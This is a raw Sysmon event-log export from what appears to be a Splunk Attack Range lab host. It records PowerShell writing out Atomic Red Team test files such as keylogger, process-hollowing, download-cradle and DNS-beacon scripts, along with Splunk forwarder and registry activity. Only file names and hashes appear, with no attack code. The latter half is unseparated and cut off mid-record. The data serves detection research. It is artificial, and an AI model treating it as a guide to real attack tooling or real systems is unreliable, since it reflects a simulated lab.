24388 | 11 | EXE | 2021-06-23 21:08:41.774 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1027.004\bin\T1027.004_DynamicCompile.exe | 2021-06-23 21:08:41.774
24387 | 11 | - | 2021-06-23 21:08:41.181 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1016\src\top-128.txt | 2021-06-23 21:08:41.181
24386 | 11 | - | 2021-06-23 21:08:41.165 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1016\src\qakbot.bat | 2021-06-23 21:08:41.165
24385 | 11 | EXE | 2021-06-23 21:08:41.024 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1014\bin\puppetstrings.exe | 2021-06-23 21:08:41.024
24396 | 3 | - | 2021-06-23 21:08:41.251 | {4DB9351A-9DF7-60D3-6D00-00000000CF01} | 3888 | C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe | NT AUTHORITY\SYSTEM | tcp | true | false | 10.0.1.14 | win-dc-663.attackrange.local | 61506 | - | false | 10.0.1.12 | - | 8000 | -
24395 | 11 | - | 2021-06-23 21:08:42.181 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1036.003\src\T1036.003_test.bat | 2021-06-23 21:08:42.181
24394 | 11 | - | 2021-06-23 21:08:42.181 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1036.003\src\T1036.003_masquerading.vbs | 2021-06-23 21:08:42.165
24393 | 11 | - | 2021-06-23 21:08:42.165 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1036.003\src\T1036.003_masquerading.ps1 | 2021-06-23 21:08:42.165
24392 | 11 | EXE | 2021-06-23 21:08:42.103 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1036.003\bin\T1036.003.exe | 2021-06-23 21:08:42.103
24409 | 11 | - | 2021-06-23 21:08:43.931 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.001\src\Get-Keystrokes.ps1 | 2021-06-23 21:08:43.931
24408 | 11 | - | 2021-06-23 21:08:43.853 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055\src\x64\T1055-macrocode.txt | 2021-06-23 21:08:43.853
24407 | 11 | - | 2021-06-23 21:08:43.759 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.012\src\T1055.012-macrocode.txt | 2021-06-23 21:08:43.759
24406 | 23 | - | 2021-06-23 21:08:43.759 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational | MD5=7E75E26C9B0A2F7608ADF387AD106B20,SHA256=D805F7F5E94F6286F36E99E632C6D76C88A08F2B088248E9ED5FA3FE83762645,IMPHASH=00000000000000000000000000000000 | false | true
24405 | 11 | - | 2021-06-23 21:08:43.743 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.012\src\Start-Hollow.ps1 | 2021-06-23 21:08:43.743
24404 | 11 | DLL | 2021-06-23 21:08:43.665 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.004\src\x64\T1055.dll | 2021-06-23 21:08:43.665
24403 | 11 | DLL | 2021-06-23 21:08:43.634 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.004\src\Win32\T1055.dll | 2021-06-23 21:08:43.634
24402 | 11 | EXE | 2021-06-23 21:08:43.525 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.004\bin\T1055.exe | 2021-06-23 21:08:43.525
24401 | 11 | DLL | 2021-06-23 21:08:43.446 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.001\src\x64\T1055.001.dll | 2021-06-23 21:08:43.446
24400 | 11 | DLL | 2021-06-23 21:08:43.415 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.001\src\Win32\T1055.001.dll | 2021-06-23 21:08:43.415
24399 | 11 | - | 2021-06-23 21:08:43.165 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1053.005\src\T1053.005-macrocode.txt | 2021-06-23 21:08:43.165
24398 | 23 | - | 2021-06-23 21:08:43.134 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational | MD5=34BF6B9AE7E421B4A30B8F2F4C616894,SHA256=15BBE125B45AEC6B301C12C3C735FFAEBCA82047720E4917F706CE0B8B0AA88C,IMPHASH=00000000000000000000000000000000 | false | true
24397 | 23 | - | 2021-06-23 21:08:43.134 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=F82AD1B836ACCBF9BC560077BE450790,SHA256=911B40EF7071ABC206F9DE0002D704431B4E038C4AAE6683435B568DD6B6B181,IMPHASH=00000000000000000000000000000000 | false | true
24423 | 11 | - | 2021-06-23 21:08:44.931 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1070.001\src\T1070.001-macrocode.txt | 2021-06-23 21:08:44.931
24422 | 23 | - | 2021-06-23 21:08:44.743 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational | MD5=9B526D769BC8B7FFCA61722E2D676DA1,SHA256=E17D871D80D1731AD43EA12C9A08E52AF267DA805A2DA61B1B3BF3943ACA1180,IMPHASH=00000000000000000000000000000000 | false | true
24421 | 11 | - | 2021-06-23 21:08:44.712 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1059.005\src\sys_info.vbs | 2021-06-23 21:08:44.712
24420 | 11 | - | 2021-06-23 21:08:44.696 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1059.005\src\T1059_005-macrocode.txt | 2021-06-23 21:08:44.696
24419 | 11 | - | 2021-06-23 21:08:44.681 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1059.005\src\T1059.005-macrocode.txt | 2021-06-23 21:08:44.681
24418 | 11 | - | 2021-06-23 21:08:44.384 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1059.001\src\test.ps1 | 2021-06-23 21:08:44.384
24417 | 11 | - | 2021-06-23 21:08:44.353 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1059.001\src\Invoke-DownloadCradle.ps1 | 2021-06-23 21:08:44.353
24416 | 11 | DLL | 2021-06-23 21:08:44.228 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.004\src\x64\T1056.004.dll | 2021-06-23 21:08:44.228
24415 | 11 | DLL | 2021-06-23 21:08:44.196 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.004\src\Win32\T1056.004.dll | 2021-06-23 21:08:44.196
24414 | 23 | - | 2021-06-23 21:08:44.165 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=543AEDCA6606E1C2C2868360AACE7C61,SHA256=E6BF8C8AB45636328BC9022F2AF92B264CC006FA5076E8951FFDC5F4A5E79B15,IMPHASH=00000000000000000000000000000000 | false | true
24413 | 11 | - | 2021-06-23 21:08:44.134 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.004\src\T1056.004\T1056.004.vcxproj | 2021-06-23 21:08:44.134
24412 | 11 | - | 2021-06-23 21:08:44.087 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.004\src\T1056.004.sln | 2021-06-23 21:08:44.087
24411 | 11 | DLL | 2021-06-23 21:08:44.056 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.004\bin\T1056.004x86.dll | 2021-06-23 21:08:44.056
24410 | 11 | DLL | 2021-06-23 21:08:44.040 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.004\bin\T1056.004x64.dll | 2021-06-23 21:08:44.040
24431 | 23 | - | 2021-06-23 21:08:45.993 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational | MD5=394DD8ABF1D76537BCEC447C7CA23BBB,SHA256=6945F6761749B826ED03158FA034FD2DB82A8A3BA198CABFB190450004DC6FF1,IMPHASH=00000000000000000000000000000000 | false | true
24430 | 11 | EXE | 2021-06-23 21:08:45.899 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1087.002\src\AdFind.exe | 2021-06-23 21:08:45.899
24429 | 11 | - | 2021-06-23 21:08:45.728 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1082\src\griffon_recon.vbs | 2021-06-23 21:08:45.728
24428 | 11 | - | 2021-06-23 21:08:45.540 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1074.001\src\Discovery.bat | 2021-06-23 21:08:45.540
24427 | 11 | - | 2021-06-23 21:08:45.509 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1074.001\bin\Folder_to_zip\T1074.txt | 2021-06-23 21:08:45.509
24426 | 11 | - | 2021-06-23 21:08:45.368 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1071.004\src\T1071-dns-domain-length.ps1 | 2021-06-23 21:08:45.368
24425 | 11 | - | 2021-06-23 21:08:45.353 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1071.004\src\T1071-dns-beacon.ps1 | 2021-06-23 21:08:45.353
24424 | 23 | - | 2021-06-23 21:08:45.212 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=4B353CD4059DCE316B49BDFC7F186578,SHA256=6A301EB6711A97A4CE7852202CBD1AEAF222A9472D102A0ADCA58714D331B58D,IMPHASH=00000000000000000000000000000000 | false | true
24438 | 23 | - | 2021-06-23 21:08:46.978 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational | MD5=FEBEA5FF41C607770AD5EDC032CAC89E,SHA256=5445210A61540B18EE9D6BAAB6E6E53A4C42EE7153BC8F9B2C053B9636B64E1F,IMPHASH=00000000000000000000000000000000 | false | true
24437 | 11 | - | 2021-06-23 21:08:46.790 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1115\src\T1115-macrocode.txt | 2021-06-23 21:08:46.790
24436 | 11 | - | 2021-06-23 21:08:46.696 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1114.001\src\Get-Inbox.ps1 | 2021-06-23 21:08:46.696
24435 | 11 | - | 2021-06-23 21:08:46.542 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1110.004\src\credstuffuserpass.txt | 2021-06-23 21:08:46.542
24434 | 11 | - | 2021-06-23 21:08:46.462 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1110.003\src\parse_net_users.bat | 2021-06-23 21:08:46.462
24433 | 11 | - | 2021-06-23 21:08:46.368 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1110.002\src\sam.txt | 2021-06-23 21:08:46.368
24432 | 23 | - | 2021-06-23 21:08:46.212 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=ECF91CFEC698AA3371D95BCC78F6FF22,SHA256=773FCCDFEDEDED48E340110243BD17DBD497056EAB88AFF954B658AD08C9DAF3,IMPHASH=00000000000000000000000000000000 | false | true
24444 | 23 | - | 2021-06-23 21:08:47.978 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational | MD5=785BF807B58225CB50F1F8F80397DC47,SHA256=A0C78174FAB443B533D266CDA9D1485B0A9858F707FCADE5FCBFB17C5B182B34,IMPHASH=00000000000000000000000000000000 | false | true
24443 | 11 | - | 2021-06-23 21:08:47.368 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1134.004\src\PPID-Spoof.ps1 | 2021-06-23 21:08:47.368
24442 | 11 | DLL | 2021-06-23 21:08:47.337 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1134.004\bin\calc.dll | 2021-06-23 21:08:47.337
24441 | 23 | - | 2021-06-23 21:08:47.290 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=258F57663B2960AF707E8DCBDA06F2D5,SHA256=F712DDD37CD19971E921C3748D0C0EBFDB8EC9896367D8146889D84BE6D84758,IMPHASH=00000000000000000000000000000000 | false | true
24440 | 11 | - | 2021-06-23 21:08:47.212 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1133\src\list of vpn extension.txt | 2021-06-23 21:08:47.212
24439 | 11 | - | 2021-06-23 (record truncated in the export)
21:08:47.071{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1127.001\src\T1127.001.csproj2021-06-23 21:08:47.071 23542300x800000000000000024454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.962{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A15E8A0AB6DAD772C12F98F377BA122F,SHA256=1FEA50E82AD229D630612B8210799310750106306F0A26C9E3D1DA7373B41EBB,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024453Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:48.946{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.007\src\x64\T1218.dll2021-06-23 21:08:48.946 354300x800000000000000024452Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:47.112{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61507-false10.0.1.12-8000- 11241100x800000000000000024451Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.790{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.005\src\powershell.ps12021-06-23 21:08:48.790 11241100x800000000000000024450Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:48.759{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.005\src\T1218.005.hta2021-06-23 21:08:48.759 11241100x800000000000000024449Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.681{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.004\src\InstallUtilTestHarness.ps12021-06-23 21:08:48.681 11241100x800000000000000024448Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.384{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.001\src\T1218.001.chm2021-06-23 21:08:48.384 23542300x800000000000000024447Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.321{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0315EB2F84DEBC1C043C5535A24C8508,SHA256=3049C5035D5E47DF72207CCC3F4C30ACB3CAFEBC1A2E83AB707A79F6DBF48370,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024446Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.087{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1204.002\src\payload.txt2021-06-23 21:08:48.087 11241100x800000000000000024445Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:48.071{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1204.002\src\chromeexec-macrocode.txt2021-06-23 21:08:48.071 11241100x800000000000000024475Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:49.946{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1221\src\readme.txt2021-06-23 21:08:49.946 23542300x800000000000000024474Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:49.946{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1E2DAE8C305DCF63EDE8522B7C826C95,SHA256=001A920C594E27B6E2C5A46AE24BD04077E5C77D5D7855382F097EF75AAC7F94,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024473Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:49.665{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218\src\x64\T1218.dll2021-06-23 21:08:49.665 11241100x800000000000000024472Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:49.634{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218\src\Win32\T1218.dll2021-06-23 21:08:49.634 11241100x800000000000000024471Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 
21:08:49.618{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll2021-06-23 21:08:49.618 13241300x800000000000000024470Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000024469Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0013b058) 13241300x800000000000000024468Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7686b-0x944fd1ce) 13241300x800000000000000024467Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d76873-0xf61439ce) 13241300x800000000000000024466Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7687c-0x57d8a1ce) 13241300x800000000000000024465Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 
21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000024464Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0013b058) 13241300x800000000000000024463Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7686b-0x944fd1ce) 13241300x800000000000000024462Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 